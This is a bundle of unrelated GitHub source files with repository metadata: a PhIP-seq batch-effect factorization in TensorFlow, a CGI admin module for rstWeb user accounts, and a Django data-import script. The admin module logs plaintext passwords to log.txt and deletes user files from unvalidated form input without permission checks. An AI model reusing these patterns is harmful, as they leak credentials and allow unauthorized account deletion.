unittest.main()
|
{
"content_hash": "867c4ea7740cab3e0f0940e0f9cc8f38",
"timestamp": "",
"source": "github",
"line_count": 847,
"max_line_length": 81,
"avg_line_length": 36.78512396694215,
"alnum_prop": 0.5465545463298778,
"repo_name": "orion/swift-config",
"id": "6dd5ef39e130ed544056b526dea4c092ab51fa83",
"size": "31742",
"binary": false,
"copies": "1",
"ref": "refs/heads/dynamic-pipeline",
"path": "test/unit/common/test_wsgi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "15048"
},
{
"name": "Python",
"bytes": "3063773"
},
{
"name": "Shell",
"bytes": "685"
}
],
"symlink_target": ""
}
|
import time
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.contrib.distributions import percentile
def do_clipped_factorization(
counts_df,
rank=3,
clip_percentile=99.9,
learning_rate=1.0,
minibatch_size=1024 * 32,
patience=5,
max_epochs=1000,
normalize_to_reads_per_million=True,
log_every_seconds=10,
):
"""
Attempt to detect and correct for clone and sample batch effects by
subtracting off a learned low-rank reconstruction of the counts matrix.
The return value is the clones x samples matrix of residuals after
correcting for batch effects, with a few additional rows and columns giving
the learned background effects.
Implements the factorization:
X = AB
where X is (clones x samples), A is (clones x rank), and B is
(rank x samples)
by minimizing the "clipped" loss:
        ||minimum(X - AB, percentile(X - AB, clip_percentile))||_2 + unclipped
The minimum is taken elementwise, and ||...||_2 is the Frobenius norm.
clip_percentile is a parameter giving the percentile to clip at. The
clipping makes the factorization robust to outliers, some of which are
likely phip-seq hits.
If the above is optimized without an `unclipped` term, a few phage clones
may have all of their residuals above the truncation threshold. Once this
happens they will likely stay stuck there since they do not contribute to
the gradient. The unclipped term fixes this by providing a small nudge
toward smaller errors without truncation.
Note that "beads-only" samples are not treated in any special way here.
The optimization is performed using stochastic gradient descent (SGD) on
tensorflow.
Parameters
----------
counts_df : pandas.DataFrame
Matrix of read counts (clones x samples)
rank : int
Rank of low-dimensional background effect matrices A and B
clip_percentile : float
Elements with reconstruction errors above this percentile do not
contribute to the gradient. Aim for a lower-bound on the fraction
of entries you expect NOT to be hits.
learning_rate : float
SGD optimizer learning rate
minibatch_size : int
Number of rows per SGD minibatch
patience : int
Number of epochs without improvement in training loss to tolerate before
stopping
max_epochs : int
Maximum number of epochs
normalize_to_reads_per_million : boolean
Before computing factorization, first divide each column by the total
        number of reads for that sample and multiply by 1 million.
log_every_seconds : float
Seconds to wait before printing another optimization status update
Returns
-------
pandas.DataFrame : residuals after correcting for batch effects
In addition to the clones x samples residuals, rows and columns named
"_background_0", "_background_1", ... giving the learned background vectors
are also included.
"""
# Non-tf setup
if normalize_to_reads_per_million:
observed = (counts_df * 1e6 / counts_df.sum(0)).astype("float32")
else:
observed = counts_df.astype("float32")
(n, s) = observed.shape
if len(counts_df) < minibatch_size:
minibatch_size = len(counts_df)
# Placeholders
target = tf.placeholder(name="target", dtype="float32", shape=[None, s])
minibatch_indices = tf.placeholder(name="minibatch_indices", dtype="int32")
# Variables
a = tf.Variable(np.random.rand(n, rank), name="A", dtype="float32")
b = tf.Variable(np.random.rand(rank, s), name="B", dtype="float32")
clip_threshold = tf.Variable(observed.max().max())
# Derived quantities
reconstruction = tf.matmul(tf.gather(a, minibatch_indices), b)
differences = target - reconstruction
# unclipped_term is based only on the minimum unclipped error for each
# clone. The intuition is that we know for every clone at least one sample
# must be a non-hit (e.g. a beads only sample), and so should be well modeled
# by the background process.
unclipped_term = tf.reduce_min(tf.pow(differences, 2), axis=1)
loss = (
tf.reduce_mean(tf.pow(tf.minimum(differences, clip_threshold), 2))
+ tf.reduce_mean(unclipped_term) / s
)
update_clip_value = clip_threshold.assign(percentile(differences, clip_percentile))
# Training
train_step = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)
init = tf.global_variables_initializer()
best_cost_value = None
last_log_at = 0
with tf.Session() as session:
session.run(init)
all_indices = np.arange(observed.shape[0], dtype=int)
for i in range(max_epochs):
indices = np.array(list(range(observed.shape[0])))
np.random.shuffle(indices)
for minibatch_indices_value in np.array_split(
indices, int(len(indices) / minibatch_size)
):
minibatch_indices_value = minibatch_indices_value[:minibatch_size]
if len(minibatch_indices_value) == minibatch_size:
feed_dict = {
target: observed.values[minibatch_indices_value],
minibatch_indices: minibatch_indices_value,
}
session.run(train_step, feed_dict=feed_dict)
feed_dict = {target: observed, minibatch_indices: all_indices}
(clip_threshold_value, cost_value) = session.run(
[update_clip_value, loss], feed_dict=feed_dict
)
# Update best epoch
if best_cost_value is None or cost_value < best_cost_value:
best_cost_value = cost_value
best_epoch = i
(best_a, best_b) = session.run([a, b], feed_dict=feed_dict)
# Log
if log_every_seconds and time.time() - last_log_at > log_every_seconds:
print(
"[Epoch %5d] %f, truncating at %f%s"
% (
i,
cost_value,
clip_threshold_value,
" [new best]" if i == best_epoch else "",
)
)
# Stop criterion
if i - best_epoch > patience:
print("Early stopping at epoch %d." % i)
break
background_names = ["_background_%d" % i for i in range(rank)]
best_a = pd.DataFrame(best_a, index=observed.index, columns=background_names)
best_b = pd.DataFrame(best_b, index=background_names, columns=observed.columns)
results = observed - np.matmul(best_a, best_b)
for name in background_names:
results[name] = best_a[name]
results.loc[name] = best_b.loc[name]
return results
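# ---------------------------------------------------------------------------
# Usage sketch (illustrative, not part of the original module; assumes a
# TensorFlow 1.x environment, since the code above relies on tf.placeholder
# and tf.contrib). The clone/sample names below are made up for the demo.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    demo_counts = pd.DataFrame(
        rng.poisson(lam=50, size=(100, 6)).astype(float),
        index=["clone_%d" % i for i in range(100)],
        columns=["sample_%d" % j for j in range(6)],
    )
    residuals = do_clipped_factorization(
        demo_counts, rank=2, max_epochs=20, minibatch_size=32,
        log_every_seconds=0,
    )
    # 100 clones + 2 background rows, 6 samples + 2 background columns
    print(residuals.shape)  # (102, 8)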
|
{
"content_hash": "c2b0edf0a8130ff59f082a1600eb7aff",
"timestamp": "",
"source": "github",
"line_count": 184,
"max_line_length": 87,
"avg_line_length": 37.53804347826087,
"alnum_prop": 0.6332705950485015,
"repo_name": "laserson/phip-stat",
"id": "bd64d9f67c8663e55032af40d06240e06cdf6b11",
"size": "6907",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "phip/clipped_factorization.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "920975"
},
{
"name": "Python",
"bytes": "76170"
}
],
"symlink_target": ""
}
|
import sys
import os
from modules.logintools.xmlsqlite import SQL
from modules.configobj import ConfigObj
from modules.pathutils import *
from modules.cgiutils import *
from loginutils import *
###################################################
def cSort(inlist, minisort=True):
"""A case insensitive sort. If minisort is True then elements of the list for which element1.lower() == element2.lower() will also be sorted.
(See the examples/test stuff."""
sortlist = []
newlist = []
sortdict = {}
for entry in inlist:
        try:
            lentry = entry.lower()
        except AttributeError:
            # entry has no lower(); sort it under itself
            sortlist.append(entry)
else:
try:
sortdict[lentry].append(entry)
except KeyError:
sortdict[lentry] = [entry]
sortlist.append(lentry)
sortlist.sort()
for entry in sortlist:
try:
thislist = sortdict[entry]
if minisort: thislist.sort()
newlist = newlist + thislist
except KeyError:
newlist.append(entry)
return newlist
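# Illustrative (comment added, not in the original source):
#   cSort(['b', 'A', 'a', 'B'])                 -> ['A', 'a', 'B', 'b']
#   cSort(['b', 'A', 'a', 'B'], minisort=False) -> ['A', 'a', 'b', 'B']
#   (with minisort off, each case-equal group keeps its input order)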
####################################################
# Various default values etc
adminpage_file = 'admin_page.html'
adminmenu_file = 'admin_menu.txt'
adminconfig_file = 'admin_config.txt' # the template used for the 'edit config' option.
admininvite_file = 'admin_invite.txt' # the template to invite/create new users
adminuser_file = 'admin_eduser.txt' # template for edit/delete user
MAXADMINLEV = 3 # the maximum admin level it's possible for a user to have
MINMAXAGE = 600 # the minimum value for cookie max-age
pass_msg = '\nYour login name is "%s", your password is "%s".\nYou can change this once you have logged in.\n'
SCRIPTLOC = 'http://' + os.environ.get('HTTP_HOST', '') # XXXX do we trust this in all cases ? (i.e. not always http - https)
numonpage = 5 # number of users shown on a page at a time
# table elements used to display the accounts in edit users
edit_table_s = '<table width="90%" cellspacing="15" bgcolor="#3377bb" class="table">'
table_e = '</table>'
elem_h = '<tr><td align="center"><table border="4" width="100%" bgcolor="#dddddd">'
elem_f = '</table></td></tr>'
form_s = '''<form method="post" action="%s"><input type="hidden" name="login" value="admin">
<input type="hidden" name="action" value="%s"><input type="hidden" name="admin" value="%s">
<input type="hidden" name="start" value="%s"><input type="hidden" name="username" value="%s">
'''
form_e = '</form>'
account_table = form_s + '''<tr>
<td align="center"><strong>Login Name : </strong></td><td align="center"><input type="text" name="loginname" value="%s"></td>
<td align="center"><strong>Real Name : </strong></td><td align="center"><input type="text" name="realname" value="%s"></td></tr><tr>
<td align="center"><strong>Email : </strong></td><td align="center"><input type="text" name="email" value="%s"></td>
<td align="center"><strong>Admin Level</strong></td><td align="center"><input type="text" name="adminlev" value="%s"></td></tr><tr>
<td align="center"><strong>New Password : </strong></td><td align="center"><input type="text" name="pass1"></td>
<td align="center"><strong>Cookie max-age : </strong></td><td align="center"><input type="text" name="maxage" value="%s"></td></tr><tr>
<td align="center"><strong>Confirm Password : </strong></td><td align="center"><input type="text" name="pass2"></td>
<td align="center"><strong>Editable : </strong></td><td align="center"><input type="checkbox" name="editable" %s ></td></tr><tr><td align="center">
<input type="reset"></td><td> </td><td> </td><td align="center"><input type="submit" value="Submit Changes"></td></tr><tr>''' + form_e + form_s + '''
<td> </td><td> </td><td> </td><td> </td></tr><tr>
<td> </td><td align="center"><input type="checkbox" name="confirm">Confirm Delete</td><td align="center"><input type="submit" value="Delete User">
</td><td> </td></tr>''' + form_e
####################################################
# main menu - offering
# edit config
# edit users (including delete)
# invite/create new users
# display edit config (including values from the default user)
# edit config
# display invite/create
# invite new users
# create new user file
# edit user - can't edit or delete yourself or the 'main admin' (saves having to change newcookie)
# choose a user to edit or delete
# display edit user for that account
# or delete user (confirm ?)
# edit user -
# change password
# rename (change login name - ?)
# change display name
# change email address
def admin(theform, userdir, thisscript, userconfig, action, newcookie):
"""Decide what admin action to perform. """
adminaction = theform.getfirst('admin', '')
if adminaction.startswith('editconfig'):
editconfig(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('invite'):
invite(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('edituser'):
edituser(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('doeditconfig'):
doeditconfig(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('doinvite'):
doinvite(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('doedituser'):
doedituser(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('deluser'):
deluser(theform, userdir, thisscript, userconfig, action, newcookie)
else:
displaymenu(theform, userdir, thisscript, userconfig, action, newcookie)
def displaymenu(theform, userdir, thisscript, userconfig, action, newcookie):
"""Display the admin menu page."""
config = ConfigObj(userdir + 'config.ini')
templatedir = config['templatedir']
adminpage = readfile(templatedir+adminpage_file)
adminpage = adminpage.replace('**this script**', thisscript + '?action=' + action)
url = '?login=admin&admin=%s&action=' + action
adminmenu = readfile(templatedir+adminmenu_file)
adminmenu = adminmenu.replace('**edit config**', thisscript+url % 'editconfig')
adminmenu = adminmenu.replace('**edit users**', thisscript+url % 'edituser')
adminmenu = adminmenu.replace('**invite**', thisscript+url % 'invite')
adminpage = adminpage.replace('**admin**', adminmenu)
adminpage = adminpage.replace('**admin menu**', thisscript+'?login=admin'+'&action='+action)
print(newcookie)
print(serverline)
print("")
print(adminpage)
sys.exit()
def editconfig(theform, userdir, thisscript, userconfig, action, newcookie, msg=None, success=None):
"""Display the screen to edit the main config file.
This includes the default user."""
config = ConfigObj(userdir + 'config.ini')
default = ConfigObj(userdir + 'default.ini')
templatedir = config['templatedir']
adminpage = readfile(templatedir+adminpage_file)
adminpage = adminpage.replace('**this script**', thisscript + '?action=' + action)
adminpage = adminpage.replace('**admin menu**', thisscript+'?login=admin'+'&action='+action)
# The values of this that are editable from config.ini are :
# newloginlink, adminmail, email_subject, email_message
#
# The values of this that are editable from default.ini are :
# max-age, editable
if msg:
adminpage = adminpage.replace('<br><!- message --> ', '<h2>'+msg+'</h2>')
if msg and not success:
loginlink = theform.getfirst('loginlink', '')
if loginlink:
loginlink = 'checked'
adminmail = theform.getfirst('adminmail', '')
emailsubj = theform.getfirst('emailsubject', '')
emailmsg = theform.getfirst('emailmsg', '')
maxage = theform.getfirst('maxage', '')
editable = theform.getfirst('editable', '')
if editable:
editable = 'checked'
else:
loginlink = config['newloginlink'].lower()
if loginlink == 'yes':
loginlink = 'checked'
else:
loginlink = ''
adminmail = config['adminmail']
emailsubj = config['email_subject']
emailmsg = config['email_message']
maxage = default['max-age']
editable = default['editable'].lower()
if editable == 'yes':
editable = 'checked'
else:
editable = ''
configmenu = readfile(templatedir+adminconfig_file)
configmenu = configmenu.replace('**loginlink**', loginlink)
configmenu = configmenu.replace('**adminmail**', adminmail)
configmenu = configmenu.replace('**email subject**', emailsubj)
configmenu = configmenu.replace('**email message**',emailmsg)
configmenu = configmenu.replace('**maxage**', maxage)
configmenu = configmenu.replace('**editable**', editable)
configmenu = configmenu.replace('**thisscript**', thisscript)
configmenu = configmenu.replace('**action**', action)
adminpage = adminpage.replace('**admin**', configmenu)
    print(newcookie)
    print(serverline)
    print("")
    print(adminpage)
sys.exit()
def invite(theform, userdir, thisscript, userconfig, action, newcookie, msg=None, success=None):
"""Display the screen to create or invite a new user."""
config = ConfigObj(userdir + 'config.ini')
templatedir = config['templatedir']
adminpage = readfile(templatedir+adminpage_file)
adminpage = adminpage.replace('**this script**', thisscript + '?action=' + action)
adminpage = adminpage.replace('**admin menu**', thisscript+'?login=admin'+'&action='+action)
# Values to be filled in are :
# **create1** and **create2** - the one switched on should be 'checked', the other should be ''
if msg:
adminpage = adminpage.replace('<br><!- message --> ', '<h2>'+msg+'</h2>')
if msg and not success:
create = theform.getfirst('create', '')
if create == 'create':
create1 = 'checked'
create2 = ''
else:
create2 = 'checked'
create1 = ''
realname = theform.getfirst('realname', '')
username = theform.getfirst('username', '')
email = theform.getfirst('email', '')
pass1 = theform.getfirst('pass1', '')
pass2 = theform.getfirst('pass2', '')
adminlev = theform.getfirst('adminlev', '')
else:
create2 = 'checked'
create1 = ''
realname = ''
username = ''
email = ''
pass1 = randomstring(8)
pass2 = pass1
adminlev = '0'
invitemenu = readfile(templatedir+admininvite_file)
invitemenu = invitemenu.replace('**create1**', create1)
invitemenu = invitemenu.replace('**create2**', create2)
invitemenu = invitemenu.replace('**realname**', realname)
invitemenu = invitemenu.replace('**username**', username)
invitemenu = invitemenu.replace('**email**', email)
invitemenu = invitemenu.replace('**pass1**', pass1)
invitemenu = invitemenu.replace('**pass2**', pass2)
invitemenu = invitemenu.replace('**adminlev**', adminlev)
invitemenu = invitemenu.replace('**thisscript**', thisscript)
invitemenu = invitemenu.replace('**action**', action)
adminpage = adminpage.replace('**admin**', invitemenu)
print(newcookie)
print(serverline)
print("")
print(adminpage)
sys.exit()
def edituser(theform, userdir, thisscript, userconfig, action, newcookie, msg=None, success=None):
"""Display the screen to edit or delete users.."""
config = ConfigObj(userdir + 'config.ini')
templatedir = config['templatedir']
realadminlev = int(userconfig['admin'])
adminpage = readfile(templatedir+adminpage_file)
adminpage = adminpage.replace('**this script**', thisscript + '?action=' + action)
adminpage = adminpage.replace('**admin menu**', thisscript+'?login=admin'+'&action='+action)
userlist = [entry[:-4] for entry in os.listdir(userdir) if os.path.isfile(userdir+entry) and entry[:-4] not in RESERVEDNAMES ]
mainadmin = config['adminuser']
username = userconfig['username']
if mainadmin in userlist:
userlist.remove(mainadmin)
if username in userlist:
userlist.remove(username)
userlist = cSort(userlist)
start = int(theform.getfirst('start', '1'))
length = len(userlist)
if start*numonpage > length:
start = length//numonpage + 1
url = '<a href="' + thisscript + '?start=%s&login=admin&admin=edituser&action=' + action + '">%s</a>'
indexline = '<div style="text-align:center;">%s</div>' % makeindexline(url, start, length, numonpage)
# need to be able to edit -
# username, realname, new password, confirm password, adminlev, email, max-age, editable
index = (start-1)*numonpage + 1
last = min(length+1, index+numonpage)
usermenu = indexline + '<br>' + edit_table_s
while index < last: # go through all the users
thisuser = userlist[index-1]
index += 1
thisuserc = ConfigObj(userdir+thisuser+'.ini')
adminlev = thisuserc['admin']
if realadminlev <= int(adminlev):
continue
loginname = thisuser
realname = thisuserc['realname']
email = thisuserc['email']
maxage = thisuserc['max-age']
editable = ''
if istrue(thisuserc['editable']):
editable = 'checked'
if theform.getfirst('username')==loginname and msg and not success:
            realname = theform.getfirst('realname', '')
email = theform.getfirst('email', '')
adminlev = theform.getfirst('adminlev', '')
maxage = theform.getfirst('maxage', '')
editable = theform.getfirst('editable', '')
if editable:
editable = 'checked'
thevals = (thisscript, action, 'doedituser', start, loginname,
loginname, realname, email, adminlev, maxage, editable,
thisscript, action, 'deluser', start, loginname)
usermenu += elem_h + (account_table % thevals) + elem_f
        # kim's stuff!!!!!
        project = action.split("_")[-1]
        sql = SQL(project)
        uid = sql.userid(thisuser, realname)
        # print "Content-Type: text/html\n"   # blank line: end of headers
        # print "kim<br>", project, thisuser, uid
        # kim's stuff ends....
usermenu += table_e + '<br>' + indexline
eduserpage = readfile(templatedir+adminuser_file)
eduserpage = eduserpage.replace('**account table**', usermenu)
if msg:
adminpage = adminpage.replace('<br><!- message --> ', '<h2>%s</h2>' % msg)
adminpage = adminpage.replace('**admin**', eduserpage)
print(newcookie)
print(serverline)
print("")
print(adminpage)
sys.exit()
##########################################################
def doeditconfig(theform, userdir, thisscript, userconfig, action, newcookie):
"""Receives the submission from the edit config page."""
config = ConfigObj(userdir + 'config.ini')
default = ConfigObj(userdir + 'default.ini')
loginlink = theform.getfirst('loginlink', '')
adminmail = theform.getfirst('adminmail', '')
emailsubj = theform.getfirst('emailsubject', '')
emailmsg = theform.getfirst('emailmsg', '')
maxage = theform.getfirst('maxage', '')
editable = theform.getfirst('editable', '')
if adminmail and not validemail(adminmail):
editconfig(theform, userdir, thisscript, userconfig, action, newcookie, "The adminmail doesn't appear to be a valid address.")
if not maxage.isdigit():
editconfig(theform, userdir, thisscript, userconfig, action, newcookie, "maxage must be a number.")
if int(maxage) and int(maxage) < MINMAXAGE:
editconfig(theform, userdir, thisscript, userconfig, action, newcookie, "maxage must be greater than %s." % MINMAXAGE)
if loginlink:
config['newloginlink'] = 'Yes'
else:
config['newloginlink'] = 'No'
config['adminmail'] = adminmail
config['email_subject'] = emailsubj
config['email_message'] = emailmsg
config.write()
default['max-age'] = maxage
if editable:
default['editable'] = 'Yes'
else:
default['editable'] = 'No'
default.write()
    displaymenu(theform, userdir, thisscript, userconfig, action, newcookie)  # XXXX should we send a msg here 'Config File Edited'?
#####################################################################
def doinvite(theform, userdir, thisscript, userconfig, action, newcookie):
"""Receives the submission from the invite/create new user page."""
config = ConfigObj(userdir + 'config.ini')
default = ConfigObj(userdir + 'default.ini')
create = theform.getfirst('create', '')
realname = theform.getfirst('realname', '')
username = theform.getfirst('username', '')
email = validemail(theform.getfirst('email', ''))
pass1 = theform.getfirst('pass1', '')
pass2 = theform.getfirst('pass2', '')
adminlev = theform.getfirst('adminlev', '')
maxadminlev = min(int(userconfig['admin']), MAXADMINLEV)
if not email:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'The email address appears to be invalid.')
if pass1 != pass2:
invite(theform, userdir, thisscript, userconfig, action, newcookie, "The two passwords don't match.")
if len(pass1) < 5:
invite(theform, userdir, thisscript, userconfig, action, newcookie, "The password must be at least five characters long.")
if not realname:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'You must supply a realname.')
if not username:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'You must supply a username.')
if not adminlev.isdigit():
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'Admin level must be a number.')
if int(adminlev) > maxadminlev:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'Admin level is greater than the maximum allowed (%s).' % maxadminlev)
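    # NOTE: invite() renders the admin page and finishes with sys.exit(), so
    # each failed check above terminates the request; that is why plain `if`
    # tests (rather than elif/return) are sufficient here.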
# now we need to check if the username already exists
tempstore = ConfigObj(userdir + 'temp.ini')
pendinglist = tempstore.get('pending', [])
if os.path.isfile(userdir+username+'.ini') or username in pendinglist or username.lower() in RESERVEDNAMES:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'username already exists.')
for char in username.lower():
if not char in validchars:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'username contains invalid characters.')
    # now we have verified the values - we *either* need to create a new username *or* send an invitation
if create == 'create':
createuser(userdir, realname, username, email, pass1, adminlev)
msg = 'New User Created'
else:
inviteuser(userdir, realname, username, email, pass1, thisscript, adminlev)
msg = 'New User Invited'
invite(theform, userdir, thisscript, userconfig, action, newcookie, msg, True)
####################################################################
def doedituser(theform, userdir, thisscript, userconfig, action, newcookie):
"""Receives form submissions from the 'edit user' page."""
# parameters to get :
# username, realname, email, adminlev, pass1, pass2
username = theform.getfirst('username') # the user we are editing
loginname = theform.getfirst('loginname') # the new user name (won't usually change I guess)
realname = theform.getfirst('realname')
email = theform.getfirst('email')
adminlev = theform.getfirst('adminlev')
pass1 = theform.getfirst('pass1')
pass2 = theform.getfirst('pass2')
maxage = theform.getfirst('maxage')
editable = theform.getfirst('editable')
maxadminlev = min(int(userconfig['admin']), MAXADMINLEV)
# check all the account values
# this could be turned into a generic 'account checker' function if we wanted.
email = validemail(email)
if not email:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'The Email Address Appears to Be Invalid.')
if not loginname:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'You Must Supply a Login Name.')
for char in loginname.lower():
if not char in validchars:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Login Name Contains Invalid Characters')
if not realname:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'You Must Supply a Real Name')
if (pass1 or pass2) and not (pass1 and pass2):
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'To Change the Password - Enter it Twice')
if pass1 != pass2:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'The Two Passwords Are Different')
if pass1 and len(pass1) < 5:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Password Must Be at Least Five Characters')
if not adminlev.isdigit():
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'The Admin Level Must Be a Number')
if int(adminlev) > maxadminlev:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Admin Level is Higher than the Max (%s).' % maxadminlev)
if not maxage.isdigit():
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Cookie "max-age" Must Be a Number')
if int(maxage) and int(maxage) < MINMAXAGE:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Cookie "max-age" Must Be Greater Than %s' % MINMAXAGE)
if editable:
editable = 'Yes'
else:
editable = 'No'
# let's just check if the username has changed
thisuser = ConfigObj(userdir+username+'.ini')
if loginname != username:
pendinglist = ConfigObj(userdir + 'temp.ini').get('pending', [])
if os.path.isfile(userdir+loginname+'.ini') or loginname in pendinglist or loginname.lower() in RESERVEDNAMES:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Login Name Chosen Already Exists')
thisuser.filename = userdir+loginname+'.ini' # change to new name
os.remove(userdir+username+'.ini') # free up the old name
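        # (ConfigObj writes to whatever `.filename` points at when `.write()`
        # is called below, so reassigning it above performs the actual rename.)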
if pass1:
from dataenc import pass_enc
thisuser['password'] = pass_enc(pass1, daynumber=True, timestamp=True)
#
thisuser['realname'] = realname
thisuser['email'] = email
thisuser['admin'] = adminlev
thisuser['max-age'] = maxage
thisuser['editable'] = editable
thisuser.write()
# edituser(theform, userdir, thisscript, userconfig, action, newcookie, '')
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Changes Made Successfully', True)
def deluser(theform, userdir, thisscript, userconfig, action, newcookie):
"""Receives form submissions from when 'delete user' is hit."""
# parameters to get :
# username, realname, email, adminlev, pass1, pass2
username = theform.getfirst('username')
confirm = theform.getfirst('confirm')
if not confirm:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Confirm Was Not Selected - Delete Not Done', True)
# XXXX we ought to check that the user being deleted isn't the main admin user and hasn't got a higher admin level
os.remove(userdir+username+'.ini') # is it really that easy
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Delete Done Successfully', True)
###############################################
# createuser is in loginutils - but this uses a couple of values defined in this module
def inviteuser(userdir, realname, username, email, password, thisscript, adminlev):
"""Invite a new user."""
from newlogin import savedetails
from configobj import ConfigObj
formdict = {'username' : username, 'pass1' : password, 'admin' : adminlev,
'realname' : realname, 'email' : email, 'action' : '' }
thekey = savedetails(userdir, formdict)
config = ConfigObj(userdir + 'config.ini')
msg = config['email_message'] + '\n'
msg = msg + SCRIPTLOC + thisscript + '?login=confirm&id=' + thekey + (pass_msg % (username, password))
writefile('log.txt', msg)
sendmailme(email, msg, config['email_subject'], email, html=False)
"""
CHANGELOG
=========
2005/10/30
----------
Fixed the email function... oops.
2005/09/16
----------
Removed dependency on caseless module (added ``cSort``).
2005/09/09
----------
Changes to work with pythonutils 0.2.1
"""
|
{
"content_hash": "cc9eb28e5f7d9358ce842c8f7d2b5561",
"timestamp": "",
"source": "github",
"line_count": 569,
"max_line_length": 159,
"avg_line_length": 44.63093145869947,
"alnum_prop": 0.6381571175428233,
"repo_name": "amir-zeldes/rstWeb",
"id": "5f39e8af3750e14c9b669cb31a7b93173719677e",
"size": "26008",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modules/logintools/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "21"
},
{
"name": "CSS",
"bytes": "13764"
},
{
"name": "Dockerfile",
"bytes": "248"
},
{
"name": "HTML",
"bytes": "22693"
},
{
"name": "JavaScript",
"bytes": "90168"
},
{
"name": "Less",
"bytes": "54854"
},
{
"name": "Python",
"bytes": "614970"
},
{
"name": "SCSS",
"bytes": "55558"
},
{
"name": "Shell",
"bytes": "220"
}
],
"symlink_target": ""
}
|
from os import path
import unicodecsv as csv
from promrep.models import DateInformation, DateType, Person, SecondarySource
def read_input_file(ifname): # noqa
file_basename = path.basename(ifname)
file_basename = path.splitext(file_basename)[0]
log_fname = file_basename + "_import-log.csv"
# sec_source, created = SecondarySource.objects.get_or_create(
# name="Nicolet Equites Data", biblio="Nicolet Biblio Entry",
# abbrev_name="Nicolet")
# log file with the ids of the objects created in the database
csv_log = csv.DictWriter(
open(log_fname, "wb"),
["person_id", "person", "status_assertion", "post_assertion"],
dialect="excel",
delimiter=";",
extrasaction="ignore",
)
csv_log.writeheader()
with open(ifname, "rU") as csvfile:
csvDict = csv.DictReader(csvfile, delimiter=";")
for row_dict in csvDict:
person_id = row_dict["Person ID"]
# will fail if we don't find the person, mostly for debug purposes
try:
person = Person.objects.get(id=person_id)
# can have up to 5 dates
for i in range(1, 6):
date_str = row_dict["Date{}".format(i)].strip()
date_ref = row_dict["DateRef{}".format(i)].strip()
uncertain_str = row_dict["DateUncertain{}".format(i)].strip()
date_type_str = row_dict["DateType{}".format(i)].strip()
date_note = row_dict["DateNotes{}".format(i)].strip()
sec_source = False
if date_ref:
try:
sec_source = SecondarySource.objects.get(
abbrev_name=date_ref
)
                        except SecondarySource.DoesNotExist:
sec_source, created = SecondarySource.objects.get_or_create(
abbrev_name=date_ref, biblio=date_ref, name=date_ref
)
if date_str:
# print i, row_dict
unc_flag = False
if uncertain_str:
unc_flag = True
date_type, created = DateType.objects.get_or_create(
name=date_type_str
)
# date can be in intervals;
# if we have a before or after,
# we'll only create a single point
interval = "S"
if "before" in date_str:
# B: Before
interval = "B"
date_str = date_str.replace("before", "").strip()
date_str = -int(date_str)
elif "after" in date_str:
# A: After
interval = "A"
date_str = date_str.replace("after", "").strip()
date_str = -int(date_str)
elif "by" in date_str:
# B: Before
interval = "B"
date_str = date_str.replace("by", "").strip()
date_str = -int(date_str) - 1
elif "AD" in date_str:
date_str = date_str.replace("AD", "").strip()
date_str = int(date_str)
else:
date_str = -int(date_str)
try:
di = DateInformation.objects.create(
person_id=person.id,
value=date_str,
uncertain=unc_flag,
date_type=date_type,
notes=date_note,
date_interval=interval,
)
if sec_source:
di.secondary_source = sec_source
di.save()
                        except Exception:
                            print("Cannot create DateInformation object for {}".format(row_dict))
                        else:
                            print("Added {} to Person {}".format(di.id, person.id))
except Exception as e:
print(e)
print(("Cannot find person with id={}".format(person_id)))
print(('Wrote log file "{}"'.format(log_fname)))
def run():
ifname = "promrep/scripts/data/life_data/LifeDatesV4.csv"
    print('Importing data from "{}"'.format(ifname))
read_input_file(ifname)
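# A minimal, self-contained sketch of the date convention implemented above.
# `parse_date` is a hypothetical helper, not part of the original promrep
# code: BC years are stored as negative integers, "before"/"by" map to
# interval "B", "after" to "A", and a plain year to "S" (a single point);
# "by N" is read as "before N + 1".
def parse_date(raw):
    raw = raw.strip()
    if "before" in raw:
        return "B", -int(raw.replace("before", "").strip())
    if "after" in raw:
        return "A", -int(raw.replace("after", "").strip())
    if "by" in raw:
        return "B", -int(raw.replace("by", "").strip()) - 1
    if "AD" in raw:
        return "S", int(raw.replace("AD", "").strip())
    return "S", -int(raw)
# e.g. parse_date("before 44") == ("B", -44); parse_date("AD 14") == ("S", 14)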
|
{
"content_hash": "53f577974b37140ccc195548252e5144",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 88,
"avg_line_length": 39.10852713178294,
"alnum_prop": 0.4103072348860258,
"repo_name": "kingsdigitallab/dprr-django",
